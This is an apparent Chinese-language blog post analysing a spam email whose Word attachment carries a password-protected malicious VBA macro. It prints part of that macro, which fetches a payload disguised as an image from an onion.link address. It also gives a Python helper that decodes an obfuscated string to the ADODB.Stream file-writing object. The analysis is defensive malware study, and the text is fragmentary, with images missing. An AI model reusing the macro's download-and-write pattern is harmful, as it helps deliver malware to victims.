一次垃圾邮件的分析

发布时间:2020-07-16 02:47:50 作者:qq414207614
来源:网络 阅读:11226

上周一(12月4号),朋友给我转发了一封垃圾邮件,邮件里面附带一个word文档,我们俩都是搞信安,自然察觉一丝危险的气味,之前也没有分析过word附件,因而有了今天的分析。

1. FBI Warning

分析有风险,请在虚拟机上运行;且在分析之前要禁止word的宏自动运行

2. 邮件截图

一次垃圾邮件的分析

3. 邮件分析

可以看到邮件的正文内容,是由一张图片和一个附件组成,其中我们要重点关注的就是。

4. 附件分析

一般分析方法

加了密码后,就不能用一般的分析方法

Sub Main
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")

WinHttpReq.Open "GET", "http://ypg7rfjvfywj7jhp.onion.link/icon.jpg", False, "username", "password"
WinHttpReq.send

如下图,使用tor浏览器访问对应的暗网链接,返回一个网页来说明该暗网地址已经失效。
一次垃圾邮件的分析

first5 = "ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)"
second5 = "ChrW(97) & ChrW(109)"
def convert_vb2py(s):
    first_s = s.replace("ChrW","chr")
    second_s = first_s.replace("&","+")
    return second_s
print eval(convert_vb2py(first5))+eval(convert_vb2py(second5))

最终我们可以得到last5的值为ADODB.Stream,它是vb中一个对象,用来与文件系统操作
一次垃圾邮件的分析


参考链接

推荐阅读:
  1. exchange 2016 安装开源垃圾邮件网关
  2. Exchange 2019反垃圾邮件组件启用反垃圾邮件功能、设置白名单\黑名单

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

垃圾邮件 vba宏 恶意软件

上一篇:Python模拟登录的几种方法

下一篇:Redis常用命令整理

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》